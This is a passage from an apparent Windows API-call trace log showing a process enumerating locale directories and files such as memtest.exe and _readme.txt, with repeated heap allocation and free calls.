nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0127.802] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.803] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.803] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce93e0 [0127.803] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.803] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.803] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0127.803] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.803] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.803] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce97f0 [0127.803] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.803] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.803] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0127.803] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.803] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.803] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9250 [0127.803] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.803] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.803] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0127.803] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0127.803] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.803] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.803] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x214) returned 0xdcfac98 [0127.803] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9908 [0127.803] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9bb0 [0127.803] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce96d8 [0127.803] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0127.803] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce90e8 [0127.803] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce97c8 [0127.803] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9b88 [0127.803] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0127.803] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0127.804] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9d90 [0127.804] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8ff8 [0127.804] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9480 [0127.804] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9160 [0127.804] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9c78 | out: hHeap=0x4970000) returned 1 [0127.804] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8490 | out: hHeap=0x4970000) returned 1 [0127.804] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce98e0 | out: hHeap=0x4970000) returned 1 [0127.804] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9228 | out: hHeap=0x4970000) returned 1 [0127.804] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9e80 | out: hHeap=0x4970000) returned 1 [0127.804] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8fd0 | out: hHeap=0x4970000) returned 1 [0127.804] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce90c0 | out: hHeap=0x4970000) returned 1 [0127.804] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9a70 | out: hHeap=0x4970000) returned 1 [0127.804] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce94a8 | out: hHeap=0x4970000) returned 1 [0127.804] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9520 | out: hHeap=0x4970000) returned 1 [0127.804] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce93e0 | out: hHeap=0x4970000) returned 1 [0127.804] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce97f0 | out: hHeap=0x4970000) returned 1 [0127.804] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9250 | out: hHeap=0x4970000) returned 1 [0127.804] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd1ba90 | out: hHeap=0x4970000) returned 1 [0127.804] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9250 [0127.804] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.804] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.804] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0127.804] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.804] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.804] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce97f0 [0127.804] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.804] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.804] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0127.804] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.805] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.805] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce93e0 [0127.805] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.805] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.805] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0127.805] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.805] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.805] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9520 [0127.805] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.805] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.805] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0127.805] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.805] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.805] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce94a8 [0127.805] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.805] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.805] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0127.805] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.805] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.805] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9a70 [0127.805] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.805] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.805] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0127.805] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.805] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.805] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x310) returned 0xdd04a68 [0127.805] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce90c0 [0127.805] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8fd0 [0127.805] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9e80 [0127.805] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9228 [0127.805] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce98e0 [0127.806] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8490 [0127.806] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9c78 [0127.806] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce99f8 [0127.806] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9f48 [0127.806] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9020 [0127.806] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9cf0 [0127.806] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce96b0 [0127.806] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9a48 [0127.806] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce95e8 [0127.806] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ef8 [0127.806] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ac0 [0127.806] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9868 [0127.806] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9598 [0127.806] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9610 [0127.806] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9908 | out: hHeap=0x4970000) returned 1 [0127.806] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9bb0 | out: hHeap=0x4970000) returned 1 [0127.806] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce96d8 | out: hHeap=0x4970000) returned 1 [0127.806] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0127.806] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce90e8 | out: hHeap=0x4970000) returned 1 [0127.806] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce97c8 | out: hHeap=0x4970000) returned 1 [0127.806] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9b88 | out: hHeap=0x4970000) returned 1 [0127.806] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0127.806] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0127.806] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9d90 | out: hHeap=0x4970000) returned 1 [0127.806] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8ff8 | out: hHeap=0x4970000) returned 1 [0127.806] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9480 | out: hHeap=0x4970000) returned 1 [0127.806] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9160 | out: hHeap=0x4970000) returned 1 [0127.806] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9250 | out: hHeap=0x4970000) returned 1 [0127.806] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce97f0 | out: hHeap=0x4970000) returned 1 [0127.806] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce93e0 | out: hHeap=0x4970000) returned 1 [0127.806] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9520 | out: hHeap=0x4970000) returned 1 [0127.806] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce94a8 | out: hHeap=0x4970000) returned 1 [0127.806] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9a70 | out: hHeap=0x4970000) returned 1 [0127.807] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfac98 | out: hHeap=0x4970000) returned 1 [0127.807] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9a70 [0127.807] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.807] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.807] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0127.807] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.807] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.807] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce94a8 [0127.807] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.807] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.807] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0127.807] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.807] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.807] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9520 [0127.807] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.807] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.807] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0127.807] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.807] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.807] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce93e0 [0127.807] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.807] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.807] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0127.807] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.807] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.807] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce97f0 [0127.807] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.807] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.807] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe36572c0, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe36572c0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe36572c0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0127.808] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe36572c0, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe36572c0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe36572c0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0127.808] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0127.808] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.808] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9048 | out: hHeap=0x4970000) returned 1 [0127.808] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9048 [0127.808] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0127.808] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.808] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.808] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.808] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.808] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.808] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.808] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.808] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.808] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.808] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.808] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.808] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.808] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.808] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.808] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.808] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.808] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.808] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.808] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | 